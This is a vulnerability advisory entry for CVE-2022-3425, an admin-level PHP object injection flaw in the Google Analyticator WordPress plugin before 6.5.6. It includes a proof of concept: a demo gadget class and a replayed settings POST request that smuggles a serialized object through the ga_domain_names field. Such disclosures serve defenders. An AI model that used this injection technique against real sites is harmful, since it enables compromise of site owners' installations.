Lucene search
Nguyễn Phạm VIệt NamWPEX-ID:DF1C36BB-9861-4272-89C9-AE76E62F687CHistoryDec 27, 2022 - 12:00 a.m.
Google Analyticator < 6.5.6 - Admin+ PHP Object Injection
2022-12-2700:00:00
Nguyễn Phạm VIệt Nam
204
google analyticator
admin
php object injection
arbitrary deserialization
gadget chain
security vulnerability
exploit
0.001 Low
EPSS
Percentile
36.6%
The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.
To simulate a gadget chain, put the following code in the plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then, as Admin, go to the plugin settings page (/wp-admin/admin.php?page=google-analyticator), save them and intercept the request made, then add ga_domain_names=O:4:"Evil":0:{}; to it and replay it:
POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1
_wpnonce=<nonce-key>&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};
The response will contain the "Arbitrary deserialization" output.
Related
cvelist
cvelist
CVE-2022-3425 Google Analyticator < 6.5.6 - Admin+ PHP Object Injection
2023-01-23 14:31:44
prion
prion
Design/Logic Flaw
2023-01-23 15:15:00
cve
cve
CVE-2022-3425
2023-01-23 15:15:13
nvd
nvd
CVE-2022-3425
2023-01-23 15:15:13
wpvulndb
wpvulndb
Google Analyticator < 6.5.6 - Admin+ PHP Object Injection
2022-12-27 00:00:00
openvas
openvas